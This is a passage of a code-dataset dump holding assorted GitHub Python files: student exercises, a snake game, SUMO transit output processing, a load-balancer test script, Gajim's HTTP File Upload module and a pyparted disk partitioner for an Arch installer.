print(str(bfs_list))\n\n\n","repo_name":"Choi-winner/Baekjoon_Python","sub_path":"BOJ1260.py","file_name":"BOJ1260.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25633245683","text":"class SinglyLinkedListNode:\n\n def __init__(self,data):\n self.data=data\n self.next=None\n\n#problem\ndef removeDuplicates(head):\n counterDict=dict()\n\n current=head\n\n while current != None:\n if current.data not in counterDict.keys():\n counterDict[current.data]=1\n else:\n counterDict[current.data] += 1\n if current.next != None and current.next.data in counterDict.keys():\n if current.next.next != None:\n current.next =current.next.next\n else:\n current.next = None\n else:\n current = current.next\n return head\n\n\n\n\ndef printLinkedList(node):\n current=node\n while current != None:\n print(current.data)\n current=current.next\n\n\nhead = SinglyLinkedListNode(16)\nhead.next=SinglyLinkedListNode(13)\nhead.next.next=SinglyLinkedListNode(1)\nhead.next.next.next=SinglyLinkedListNode(1)\nhead.next.next.next.next=SinglyLinkedListNode(1)\nhead.next.next.next.next.next=SinglyLinkedListNode(7)\n\nprintLinkedList(removeDuplicates(head))\n","repo_name":"Burakdal/AlgorithmPractise","sub_path":"LinkedList/problem_8.py","file_name":"problem_8.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"74201679553","text":"n1 = float(input('Digite um número '))\r\nn2 = float(input('Digite outro número '))\r\nn3 = float(input('Digite outro número '))\r\n\r\nif n1>n2 and n1>n3 and n2>n3:\r\n print('O maior número é {} e o menor número é {}.'.format(n1,n3))\r\nelif n1>2 and n1>n3 and n3>n2:\r\n print('Omairo número é {} e o menor número é {}.'.format(n1,n2))\r\nelif n2>n1 and n2>n3 and n1>n3:\r\n print('O maior número é {} e o menor número é {}.'. format(n2,n3))\r\nelif n2>n1 and n2>n3 and n3>n1:\r\n print('O maior número é {} e o menor número é {}.'.format(n2,n1))\r\nelif n3>n1 and n3>n2 and n1>n2:\r\n print('O maior número é {} e o menor número é {}.'.format(n3,n2))\r\nelif n3>n1 and n3>n2 and n2>n1:\r\n print('O maior número é {} e o menro número é {}.'.format(n3,n1))","repo_name":"Fillipe-Andrade-Barreto104/Projetos-aprendizado-python","sub_path":"desafio34.py","file_name":"desafio34.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70031056836","text":"\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n## convert xml to csv\r\nrunfile('E:/SUMO/tools/xml/xml2csv.py',wdir='E:/SUMO/tools/xml', args='EdgeData.xml')\r\nrunfile('E:/SUMO/tools/xml/xml2csv.py',wdir='E:/SUMO/tools/xml', args='busstop_output.xml')\r\nrunfile('E:/SUMO/tools/xml/xml2csv.py',wdir='E:/SUMO/tools/xml', args='trajectories_output.xml -p')\r\n# -p is used to split the output files based on the first level\r\n\r\n## bus stop output containing delay and person load information\r\nstopO = pd.read_csv(\"busstop_output.csv\",sep=';')\r\nstopO=stopO[[\"stopinfo_id\",\"stopinfo_busStop\",\"stopinfo_started\",\"stopinfo_arrivalDelay\",\r\n \"stopinfo_ended\",\"stopinfo_delay\",\"stopinfo_initialPersons\",\r\n \"stopinfo_loadedPersons\",\"stopinfo_unloadedPersons\",\r\n \"stopinfo_lane\",\"stopinfo_pos\",\"stopinfo_parking\"]]\r\nstopO=stopO.sort_values([\"stopinfo_id\",\"stopinfo_started\"])\r\n# write final stop output \r\nstopO.to_csv(\"./output/busstop_info.csv\",index=False)\r\n\r\n\r\n## edge based output with mean speed for each hour(3600s)\r\nedgeO = pd.read_csv(\"EdgeData.csv\",sep=';')\r\nedgeO=edgeO[[\"interval_begin\",\"interval_end\",\"edge_id\",\"edge_speed\",\r\n \"edge_density\",\"edge_laneDensity\",\"edge_left\",\r\n \"edge_occupancy\",\"edge_traveltime\",\r\n \"edge_waitingTime\",\"edge_entered\"]]\r\n# UNIT: \"edge_speed\":m/s, \"edge_density\":#veh/km, \"edge_occupancy\":%\r\nedgeO.to_csv(\"./output/edge_info.csv\",index=False)\r\n\r\n\r\n## trajectory for all vehicles during the simulation time interval\r\nmotion = pd.read_csv(\"trajectories_outputmotionState.csv\",sep=';',low_memory=False)\r\nvehtype = pd.read_csv(\"trajectories_outputactorConfig.csv\",sep=';')\r\nvehref = pd.read_csv(\"trajectories_outputvehicle.csv\",sep=';')\r\n\r\n# extract the output values for buses\r\nvehref['vehicle_ref'] = vehref['vehicle_ref'].astype('str')\r\nbus=vehref[vehref['vehicle_ref'].apply(lambda x: len(x)>20)]\r\nbusref=bus[['vehicle_ref','vehicle_id','vehicle_actorConfig']]\r\nbusref.rename(columns={'vehicle_actorConfig' : 'actorConfig_id'},inplace = True)\r\n# join busref and vehtype by the same column 'actorConfig_id'\r\nbusinfo=pd.merge(busref, vehtype, on='actorConfig_id')\r\n\r\ntraj=motion.loc[motion.motionState_vehicle.isin(businfo.vehicle_id), ]\r\ntraj=traj[['motionState_vehicle','motionState_time','motionState_speed','motionState_acceleration']]\r\ntraj=traj.sort_values(['motionState_vehicle','motionState_time'])\r\ntraj.rename(columns={'motionState_vehicle' : 'vehicle_id','motionState_time':'time','motionState_speed':'speed',\r\n 'motionState_acceleration':'acceleration'},inplace = True)\r\n# UNIT: time:milliseconds, speed:0.01m/s, acceleration:0.0001m/s^2\r\ntrajectory=pd.merge(traj, businfo, on='vehicle_id')\r\ntrajectory=trajectory.drop(['vehicle_id'],axis=1)\r\n#group dataframe into multiple dataframe as a dict by bus name\r\ntrajectory=dict(tuple(trajectory.groupby('vehicle_ref')))\r\n#write in csv files, bus trip name as the file name\r\nfor key, df in trajectory.items():\r\n bus=key.replace(':','')\r\n with open('./output/' + 'Trajectory_' + bus + '.csv', 'w', newline='') as oFile:\r\n df.to_csv(oFile, index = False)\r\n print(\"Finished writing: \" + 'Trajectory_' + 
bus)\r\n\r\n","repo_name":"smarttransit-ai/transit-gym","sub_path":"manual_files/codes/outputProcess.py","file_name":"outputProcess.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"3612028677","text":"import subprocess\nimport os\nimport sys\nimport argparse\nimport time\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-algo', type=str, required=True, help=\"Algorithm to use\")\nparser.add_argument('-clientCount', type=int, required=True, help=\"Number of clients\")\nparser.add_argument('-serverCount', type=int, required=True, help=\"Number of servers\")\n\nargs = parser.parse_args()\n\nif (args.algo != \"ROUND_ROBIN\" and args.algo != \"LEAST_CONNECTIONS\"):\n print(\"Error, algorithm not recognized\")\n sys.exit(1)\n\n#subprocess.call(\"./loadBalancer.py -algo ROUND_ROBIN &\")\nexecString = \"python3 loadBalancer.py -algo \" + args.algo + \" &\"\nos.system(execString)\n\nport = 4001\nccountArr = [2, 5, 3, 4, 6, 1]\nfor i in range(args.serverCount):\n thisPort = port + i\n execString = \"python3 loadBalancedServer.py -cport \" + str(thisPort) + \" -ccount \" + str(ccountArr[i]) + \" -ip '127.0.0.1' &\"\n #subprocess.call(execString)\n os.system(execString)\n\ntime.sleep(2)\n\nfor i in range(args.clientCount):\n execString = \"python3 client.py &\"\n #subprocess.call(execString)\n os.system(execString)\n time.sleep(0.2)\n\ntime.sleep(120) # Run for 2 minutes\nkillString = \"killall python3\"\nos.system(killString)\n\n","repo_name":"Stygain/virtualizing-gridlock-throughput-opinion","sub_path":"networkSetup.py","file_name":"networkSetup.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"70692006914","text":"from typing import Tuple\nimport pygame\nfrom pygame.locals import * \nfrom sys import exit \nfrom random import randint \nfrom time import sleep\n\npygame.init()\npygame.mixer.init() \n\npygame.mixer.music.set_volume(0.1) \nmusica_de_fundo = pygame.mixer.music.load('sons/Tec-Pix.wav') \npygame.mixer.music.play(-1) \n\n\"\"\"barulho_colisao = pygame.mixer.Sound('sons/smw_coin.wav')\"\"\"\n\nlargura = 640\naltura = 480\nx_cobra = int(largura / 2)\ny_cobra = int(altura / 2)\n\nvelocidade = 3\nx_controle = velocidade\ny_controle = 0\n\nx_maca = randint(40, 600)\ny_maca = randint(50, 430)\n\npontos = 0\nfonte = pygame.font.SysFont('arial', 40, True, True) \n\nrelogio = pygame.time.Clock() \ntela = pygame.display.set_mode((largura, altura)) \npygame.display.set_caption('Snake Game com estilo') \nlista_cobra = []\ncomprimento_inicial = 10\nmorreu = False\ninicio = True\n\n\ndef aumenta_cobra(lista_cobra):\n for XeY in lista_cobra:\n pygame.draw.rect(tela, (0, 0, 255), (XeY[0], XeY[1], 20, 20))\n\ndef reiniciar_jogo() :\n global pontos, comprimento_inicial, x_cobra, y_cobra, lista_cabeça, lista_cobra, x_maca, y_maca, morreu\n pontos = 0\n comprimento_inicial = 10\n x_cobra = int(largura / 2)\n y_cobra = int(altura / 2) \n lista_cobra = []\n lista_cabeça = []\n x_maca = randint(40, 600)\n y_maca = randint(50, 430)\n morreu = False\n \n\ndef mensagemInicial():\n msgInfo = 'Movimentação: W (cima), S (baixo), A (esquerda), D (direita)'\n txtInfo = fonte.render(msgInfo, True, (0,255,0))\n \n #pygame.display.update()\n\n fonte2 = pygame.font.SysFont('arial', 20, True, True )\n texto_formatado = fonte2.render(msgInfo, True, (84, 22, 180))\n ret_texto = texto_formatado.get_rect()\n ret_texto.center = (largura//2, altura//2)\n tela.blit(texto_formatado,ret_texto)\n pygame.display.update()\n sleep(5)\n \n \nwhile True: \n if inicio == True:\n mensagemInicial()\n inicio = False\n relogio.tick(90) \n tela.fill((0,0,0)) \n msg = f'Score: {pontos}' \n txt = fonte.render(msg, True, (84, 22, 180))\n for event in pygame.event.get(): \n if event.type == QUIT:\n pygame.quit()\n exit()\n \n if event.type == KEYDOWN:\n if event.key == K_q:\n pygame.quit()\n exit()\n\n if event.key == K_a: \n if x_controle == velocidade:\n ...\n else:\n x_controle = -velocidade\n y_controle = 0\n\n if event.key == K_d:\n if x_controle == -velocidade:\n ...\n else:\n x_controle = velocidade\n y_controle = 0\n\n if event.key == K_w:\n if y_controle == velocidade:\n ...\n else:\n y_controle = -velocidade\n x_controle = 0\n\n if event.key == K_s:\n if y_controle == -velocidade:\n ...\n else:\n y_controle = velocidade\n x_controle = 0\n \n\n x_cobra += x_controle\n y_cobra += y_controle\n\n cobra = pygame.draw.rect(tela, (128, 0, 128), (x_cobra, y_cobra, 20, 20)) \n maca = pygame.draw.rect(tela, (252,15,192), (x_maca, y_maca, 20, 20)) \n\n if cobra.colliderect(maca): \n x_maca = randint(40, 600)\n y_maca = randint(40, 430)\n pontos += 1\n #barulho_colisao.play() \n comprimento_inicial +=1\n\n lista_cabeça = [] \n lista_cabeça.append(x_cobra)\n lista_cabeça.append(y_cobra)\n \n\n lista_cobra.append(lista_cabeça)\n\n \n \n if lista_cobra.count(lista_cabeça) > 1:\n fonte2 = pygame.font.SysFont('arial', 20, True, True )\n mensagem = 'Gamer Over? 
Prencione R'\n texto_formatado = fonte2.render(mensagem, True, (88,22,180))\n ret_texto = texto_formatado.get_rect()\n morreu = True\n while morreu:\n tela.fill((0,0,0))\n for event in pygame.event.get():\n \n if event.type == QUIT:\n pygame.quit()\n exit()\n \n if event.type == KEYDOWN:\n if event.key == K_r:\n reiniciar_jogo()\n ret_texto.center = (largura//2, altura//2)\n tela.blit(texto_formatado,ret_texto)\n pygame.display.update()\n \n if x_cobra > largura: \n x_cobra = 0\n if x_cobra < 0:\n x_cobra = largura\n if y_cobra < 0:\n y_cobra = altura\n\n if y_cobra > altura:\n y_cobra = 0\n \n\n if len(lista_cobra ) > comprimento_inicial:\n del lista_cobra[0]\n\n aumenta_cobra(lista_cobra)\n tela.blit(txt, (450, 40))\n pygame.display.update() \n","repo_name":"andrei406/Snake-Game-Vapoware-Editon","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10151666159","text":"# This file is part of Gajim.\n#\n# Gajim is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published\n# by the Free Software Foundation; version 3 only.\n#\n# Gajim is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Gajim. If not, see .\n\n# XEP-0363: HTTP File Upload\n\nfrom __future__ import annotations\n\nfrom typing import cast\nfrom typing import Callable\nfrom typing import Optional\n\nimport os\nimport io\nfrom urllib.parse import urlparse\nimport mimetypes\nfrom collections import defaultdict\nfrom pathlib import Path\n\nfrom nbxmpp.errors import StanzaError\nfrom nbxmpp.errors import MalformedStanzaError\nfrom nbxmpp.errors import HTTPUploadStanzaError\nfrom nbxmpp.namespaces import Namespace\nfrom nbxmpp.protocol import JID\nfrom nbxmpp.structs import DiscoInfo\nfrom nbxmpp.structs import HTTPUploadData\nfrom nbxmpp.task import Task\nfrom nbxmpp.util import convert_tls_error_flags\n\nfrom gi.repository import Gio\nfrom gi.repository import GLib\nfrom gi.repository import Soup\n\nfrom gajim.common import app\nfrom gajim.common import types\nfrom gajim.common.events import HTTPUploadError\nfrom gajim.common.events import HTTPUploadStarted\nfrom gajim.common.i18n import _\nfrom gajim.common.helpers import get_tls_error_phrases\nfrom gajim.common.helpers import get_account_proxy\nfrom gajim.common.const import FTState\nfrom gajim.common.filetransfer import FileTransfer\nfrom gajim.common.modules.base import BaseModule\nfrom gajim.common.exceptions import FileError\nfrom gajim.common.structs import OutgoingMessage\n\n\nclass HTTPUpload(BaseModule):\n\n _nbxmpp_extends = 'HTTPUpload'\n\n def __init__(self, con: types.Client) -> None:\n BaseModule.__init__(self, con)\n\n self.available = False\n self.component: Optional[JID] = None\n self.httpupload_namespace: Optional[str] = None\n self.max_file_size: Optional[float] = None # max file size in bytes\n\n self._proxy_resolver: Optional[Gio.SimpleProxyResolver] = None\n self._queued_messages: dict[int, Soup.Message] = {}\n self._session = Soup.Session()\n self._session.props.ssl_strict = False\n self._session.props.user_agent = f'Gajim {app.version}'\n\n self._running_transfers: dict[\n tuple[str, JID], set[HTTPFileTransfer]] = defaultdict(set)\n\n def _set_proxy_if_available(self) -> None:\n proxy = get_account_proxy(self._account)\n if proxy is None:\n self._proxy_resolver = None\n self._session.props.proxy_resolver = None\n else:\n self._proxy_resolver = proxy.get_resolver()\n self._session.props.proxy_resolver = self._proxy_resolver\n\n def pass_disco(self, info: DiscoInfo) -> None:\n if not info.has_httpupload:\n return\n\n self.available = True\n self.httpupload_namespace = Namespace.HTTPUPLOAD_0\n self.component = info.jid\n self.max_file_size = info.httpupload_max_file_size\n\n self._log.info('Discovered component: %s', info.jid)\n\n if self.max_file_size is None:\n self._log.warning('Component does not provide maximum file size')\n else:\n size = GLib.format_size_full(int(self.max_file_size),\n GLib.FormatSizeFlags.IEC_UNITS)\n self._log.info('Component has a maximum file size of: %s', size)\n\n def get_running_transfers(self,\n contact: types.ChatContactT\n ) -> 
Optional[set[HTTPFileTransfer]]:\n\n return self._running_transfers.get((contact.account, contact.jid))\n\n def send_file(self, contact: types.ChatContactT, path: Path) -> None:\n encryption = contact.settings.get('encryption') or None\n\n try:\n transfer = self._make_transfer(\n path,\n encryption,\n contact)\n except FileError as error:\n event = HTTPUploadError(\n contact.account,\n contact.jid,\n _('Could not open file (%s)') % str(error))\n app.ged.raise_event(event)\n return\n\n transfer.connect('cancel', self._on_cancel_upload)\n transfer.connect('state-changed', self._on_http_upload_state_changed)\n\n event = HTTPUploadStarted(\n contact.account,\n contact.jid,\n transfer)\n app.ged.raise_event(event)\n self._start_transfer(transfer)\n\n def _make_transfer(self,\n path: Path,\n encryption: Optional[str],\n contact: types.ChatContactT,\n ) -> HTTPFileTransfer:\n\n if not path or not path.exists():\n raise FileError(_('Could not access file'))\n\n invalid_file = False\n msg = ''\n stat = path.stat()\n\n if os.path.isfile(path):\n if stat[6] == 0:\n invalid_file = True\n msg = _('File is empty')\n else:\n invalid_file = True\n msg = _('File does not exist')\n\n if (self.max_file_size is not None and\n stat.st_size > self.max_file_size):\n invalid_file = True\n size = GLib.format_size_full(int(self.max_file_size),\n GLib.FormatSizeFlags.IEC_UNITS)\n msg = _('File is too large, '\n 'maximum allowed file size is: %s') % size\n\n if invalid_file:\n raise FileError(msg)\n\n mime = mimetypes.MimeTypes().guess_type(path)[0]\n if not mime:\n mime = 'application/octet-stream' # fallback mime type\n self._log.info('Detected MIME type of file: %s', mime)\n\n transfer = HTTPFileTransfer(self._account,\n str(path),\n contact,\n mime,\n encryption,\n contact.is_groupchat)\n\n key = (contact.account, contact.jid)\n self._running_transfers[key].add(transfer)\n\n return transfer\n\n def _on_http_upload_state_changed(self,\n transfer: HTTPFileTransfer,\n _signal_name: str,\n state: FTState\n ) -> None:\n\n if state.is_finished:\n uri = transfer.get_transformed_uri()\n\n type_ = 'chat'\n if transfer.is_groupchat:\n type_ = 'groupchat'\n\n message = OutgoingMessage(account=transfer.account,\n contact=transfer.contact,\n message=uri,\n type_=type_,\n oob_url=uri)\n\n self._client.send_message(message)\n\n def _on_cancel_upload(self,\n transfer: HTTPFileTransfer,\n _signal_name: str\n ) -> None:\n\n transfer.set_cancelled()\n\n key = (transfer.account, transfer.contact.jid)\n self._running_transfers[key].discard(transfer)\n\n message = self._queued_messages.get(id(transfer))\n if message is None:\n return\n\n self._session.cancel_message(message, Soup.Status.CANCELLED)\n\n def _start_transfer(self, transfer: HTTPFileTransfer) -> None:\n if transfer.encryption is not None and not transfer.is_encrypted:\n transfer.set_encrypting()\n plugin = app.plugin_manager.encryption_plugins[transfer.encryption]\n if hasattr(plugin, 'encrypt_file'):\n plugin.encrypt_file(transfer,\n self._account,\n self._start_transfer)\n else:\n transfer.set_error('encryption-not-available')\n\n return\n\n transfer.set_preparing()\n self._log.info('Sending request for slot')\n self._nbxmpp('HTTPUpload').request_slot(\n jid=self.component,\n filename=transfer.filename,\n size=transfer.size,\n content_type=transfer.mime,\n callback=self._received_slot,\n user_data=transfer)\n\n def _received_slot(self, task: Task) -> None:\n transfer = cast(HTTPFileTransfer, task.get_user_data())\n\n try:\n result = task.finish()\n except (StanzaError,\n 
HTTPUploadStanzaError,\n MalformedStanzaError) as error:\n\n if error.app_condition == 'file-too-large':\n size_text = GLib.format_size_full(\n error.get_max_file_size(),\n GLib.FormatSizeFlags.IEC_UNITS)\n\n error_text = _('File is too large, '\n 'maximum allowed file size is: %s' % size_text)\n transfer.set_error('file-too-large', error_text)\n\n else:\n transfer.set_error('misc', str(error))\n\n return\n\n transfer.process_result(result)\n\n if (urlparse(transfer.put_uri).scheme != 'https' or\n urlparse(transfer.get_uri).scheme != 'https'):\n transfer.set_error('unsecure')\n return\n\n self._log.info('Uploading file to %s', transfer.put_uri)\n self._log.info('Please download from %s', transfer.get_uri)\n\n self._upload_file(transfer)\n\n def _upload_file(self, transfer: HTTPFileTransfer) -> None:\n transfer.set_started()\n\n assert transfer.put_uri is not None\n message = Soup.Message.new('PUT', transfer.put_uri)\n message.connect('starting', self._check_certificate, transfer)\n\n # Set CAN_REBUILD so chunks get discarded after they have been\n # written to the network\n message.set_flags(Soup.MessageFlags.CAN_REBUILD |\n Soup.MessageFlags.NO_REDIRECT)\n\n assert message.props.request_body is not None\n message.props.request_body.set_accumulate(False)\n\n assert message.props.request_headers is not None\n message.props.request_headers.set_content_type(transfer.mime, None)\n message.props.request_headers.set_content_length(transfer.size)\n for name, value in transfer.headers.items():\n message.props.request_headers.append(name, value)\n\n message.connect('wrote-headers', self._on_wrote_headers, transfer)\n message.connect('wrote-chunk', self._on_wrote_chunk, transfer)\n\n self._queued_messages[id(transfer)] = message\n self._set_proxy_if_available()\n self._session.queue_message(message, self._on_finish, transfer)\n\n def _check_certificate(self,\n message: Soup.Message,\n transfer: HTTPFileTransfer\n ) -> None:\n https_used, tls_certificate, tls_errors = message.get_https_status()\n if not https_used:\n self._log.warning('HTTPS was not used for upload')\n transfer.set_error('unsecure')\n self._session.cancel_message(message, Soup.Status.CANCELLED)\n return\n\n tls_error_set = convert_tls_error_flags(tls_errors)\n if app.cert_store.verify(tls_certificate, tls_error_set):\n return\n\n phrases = get_tls_error_phrases(tls_error_set)\n self._log.warning(\n 'TLS verification failed: %s (0x%02x)', phrases, tls_errors)\n transfer.set_error('tls-verification-failed', phrases[0])\n self._session.cancel_message(message, Soup.Status.CANCELLED)\n\n def _on_finish(self,\n _session: Soup.Session,\n message: Soup.Message,\n transfer: HTTPFileTransfer\n ) -> None:\n\n self._queued_messages.pop(id(transfer), None)\n\n key = (transfer.account, transfer.contact.jid)\n self._running_transfers[key].discard(transfer)\n\n if message.props.status_code == Soup.Status.CANCELLED:\n self._log.info('Upload cancelled')\n return\n\n if message.props.status_code in (Soup.Status.OK, Soup.Status.CREATED):\n self._log.info('Upload completed successfully')\n transfer.set_finished()\n\n else:\n phrase = Soup.Status.get_phrase(message.props.status_code)\n self._log.error('Got unexpected http upload response code: %s',\n phrase)\n transfer.set_error('http-response', phrase)\n\n def _on_wrote_chunk(self,\n message: Soup.Message,\n transfer: HTTPFileTransfer\n ) -> None:\n transfer.update_progress()\n if transfer.is_complete:\n assert message.props.request_body is not None\n message.props.request_body.complete()\n return\n\n 
bytes_ = transfer.get_chunk()\n assert bytes_ is not None\n self._session.pause_message(message)\n GLib.idle_add(self._append, message, bytes_)\n\n def _append(self, message: Soup.Message, bytes_: bytes) -> None:\n if message.props.status_code == Soup.Status.CANCELLED:\n return\n self._session.unpause_message(message)\n assert message.props.request_body is not None\n message.props.request_body.append(bytes_)\n\n @staticmethod\n def _on_wrote_headers(message: Soup.Message,\n transfer: HTTPFileTransfer\n ) -> None:\n bytes_ = transfer.get_chunk()\n assert bytes_ is not None\n assert message.props.request_body is not None\n message.props.request_body.append(bytes_)\n\n\nclass HTTPFileTransfer(FileTransfer):\n\n _state_descriptions = {\n FTState.ENCRYPTING: _('Encrypting file…'),\n FTState.PREPARING: _('Requesting HTTP File Upload Slot…'),\n FTState.STARTED: _('Uploading via HTTP File Upload…'),\n }\n\n _errors = {\n 'unsecure': _('The server returned an insecure transport (HTTP).'),\n 'encryption-not-available': _('There is no encryption method available '\n 'for the chosen encryption.')\n }\n\n def __init__(self,\n account: str,\n path: str,\n contact: types.ContactT,\n mime: str,\n encryption: Optional[str],\n groupchat: bool\n ) -> None:\n\n FileTransfer.__init__(self, account)\n\n self._path = path\n self._encryption = encryption\n self._groupchat = groupchat\n self._contact = contact\n self._mime = mime\n\n self.size = os.stat(path).st_size\n self.put_uri: Optional[str] = None\n self.get_uri: Optional[str] = None\n self._uri_transform_func: Optional[Callable[[str], str]] = None\n\n self._stream = None\n self._data: Optional[bytes] = None\n self._headers: dict[str, str] = {}\n\n self._is_encrypted = False\n\n @property\n def mime(self) -> str:\n return self._mime\n\n @property\n def contact(self) -> types.ContactT:\n return self._contact\n\n @property\n def is_groupchat(self) -> bool:\n return self._groupchat\n\n @property\n def encryption(self) -> Optional[str]:\n return self._encryption\n\n @property\n def headers(self) -> dict[str, str]:\n return self._headers\n\n @property\n def path(self) -> str:\n return self._path\n\n @property\n def is_encrypted(self) -> bool:\n return self._is_encrypted\n\n def get_transformed_uri(self) -> str:\n if self._uri_transform_func is not None:\n return self._uri_transform_func(self.get_uri)\n return self.get_uri\n\n def set_uri_transform_func(self, func: Callable[[str], str]) -> None:\n self._uri_transform_func = func\n\n @property\n def filename(self) -> str:\n return os.path.basename(self._path)\n\n def set_error(self, domain: str, text: str = '') -> None:\n if not text:\n text = self._errors[domain]\n\n self._close()\n super().set_error(domain, text)\n\n def set_finished(self) -> None:\n self._close()\n super().set_finished()\n\n def set_encrypted_data(self, data: bytes) -> None:\n self._data = data\n self._is_encrypted = True\n\n def _close(self) -> None:\n if self._stream is not None:\n self._stream.close()\n\n def get_chunk(self) -> Optional[bytes]:\n if self._stream is None:\n if self._encryption is None:\n self._stream = open(self._path, 'rb') # pylint: disable=consider-using-with # noqa: E501\n else:\n self._stream = io.BytesIO(self._data)\n\n data = self._stream.read(16384)\n if not data:\n self._close()\n return None\n self._seen += len(data)\n if self.is_complete:\n self._close()\n return data\n\n def get_data(self) -> bytes:\n with open(self._path, 'rb') as file:\n data = file.read()\n return data\n\n def process_result(self, result: 
HTTPUploadData) -> None:\n self.put_uri = result.put_uri\n self.get_uri = result.get_uri\n self._headers = result.headers\n","repo_name":"SWAG-MLG-420/Gajim_SWAG_MLG_M.O.D","sub_path":"venv/lib/python3.10/site-packages/gajim/common/modules/httpupload.py","file_name":"httpupload.py","file_ext":"py","file_size_in_byte":17620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"73751671234","text":"# nota_de_trecere =4.5\n# nota = int(input('alege nota'))\n# print(\"okay\")\n# if nota> nota_de_trecere:\n# print(\"pass\")\n# print(\"okay\")\n# else:\n# print(\"fail\")\n#\n# print(\"true\")\n\n# a, b = input(\"introdu 2 numere intregi separate de spatiu\").split()\n# print(a,b)\n# a, b = int(a), int(b)\n#\n# operator = input(\"alege un operator (+ - * // )\")\n# if operator == \"+\":\n# print(a+b)\n# elif operator == \"-\":\n# print(a-b)\n# elif operator == \"*\":\n# print(a*b)\n# else:\n# print(a/b)\nnote_sesiune = input(\"introdu\")\nnote_sesiune = note_sesiune.split()\nprint(type(note_sesiune))","repo_name":"DanMicu/Intro_python","sub_path":"curs2/exercitii_if.py","file_name":"exercitii_if.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"43145723970","text":"class Solution:\n def numIdenticalPairs(self, nums: List[int]) -> int:\n d = {}\n m = len(nums)\n for i in nums:\n if i in d:d[i]+=1\n else:d[i] = 1\n c = 0\n for i in d:\n c = c + d[i]*(d[i]-1)//2\n return c","repo_name":"hardik302001/leetcode","sub_path":"problems/number_of_good_pairs/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"28636767744","text":"import string\nimport parted\nimport subprocess\n\n\nclass color:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\n\nclass Partitioner:\n\n def __init__(self):\n self.__devices = parted.getAllDevices()\n\n def refresh_devices(self):\n self.__devices = parted.getAllDevices()\n\n def get_devices(self):\n return self.__devices\n\n def print_devices(self) -> None:\n self.refresh_devices()\n for device in self.__devices:\n self.print_device(device)\n\n def print_device(self, device: parted.Device):\n print(color.BOLD + \"Disk {}\".format(device.model) + color.END)\n print(\"Size: {}\".format(self.bytes_to_readable(device.sectorSize * device.length)))\n print(\"Path: {}\".format(device.path))\n\n # Print partitions\n disk = parted.newDisk(device)\n print(color.BOLD + \"Partition\\t\\tSize\\t\\tFile System\" + color.END)\n for partition in disk.getPrimaryPartitions():\n path = partition.path\n size = self.bytes_to_readable(partition.geometry.length*device.sectorSize)\n type = partition.fileSystem.type\n print(\"{}\\t\\t{}\\t\\t{}\".format(path, size, type))\n print(\"\")\n\n def repartition(self, device: parted.Device) -> parted.Partition:\n disk = parted.newDisk(device)\n # Delete the current partitions and create a new one\n if disk.deleteAllPartitions() and disk.commit():\n new_partition = self.create_partition(device, 0, device.getLength()-1)\n\n # Format the newly created partition and whether or not the return code was 0\n self.format_partition(new_partition, \"ext4\")\n return new_partition\n raise Exception(\"Couldn't delete old partition table\")\n\n def format_partition(self, partition: parted.Partition, filesystem: string) -> None:\n # Format the newly created partition and whether or not the return code was 0\n result = subprocess.run([\"/usr/sbin/mkfs\", \"-F\", \"-t\", filesystem, partition.path])\n if result.returncode != 0:\n raise Exception(\"The partition {} could not be formatted\".format(partition.path))\n\n def create_partition(self, device: parted.Device, start: int, length: int=None, end: int=None, partition_type: int=parted.PARTITION_NORMAL, filesystem_type: string=\"ext4\") -> parted.Partition:\n disk = parted.newDisk(device)\n geometry = parted.Geometry(device=device, start=start, end=end, length=length)\n filesystem = parted.FileSystem(type=filesystem_type, geometry=geometry)\n constraint = parted.Constraint(device=device)\n\n partition = parted.Partition(disk, partition_type, geometry=geometry, fs=filesystem)\n\n # Create the partition\n if disk.addPartition(partition, constraint) and disk.commit():\n return partition\n\n raise Exception(\"Partition {} could not be created\".format(partition.path))\n\n def bytes_to_readable(self, size: int) -> string:\n if size >= (1024**4):\n return \"{} TB\".format(round(size / 1024**4, 1))\n elif size >= (1024**3):\n return \"{} GB\".format(round(size / 1024**3, 1))\n elif size >= (1024**2):\n return \"{} MB\".format(round(size / 1024**2, 1))\n elif size >= (1024**1):\n return \"{} KB\".format(round(size / 1024, 1))\n else:\n return \"{} bytes\".format(size)\n","repo_name":"sharkwouter/arch-installer","sub_path":"partitioner.py","file_name":"partitioner.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
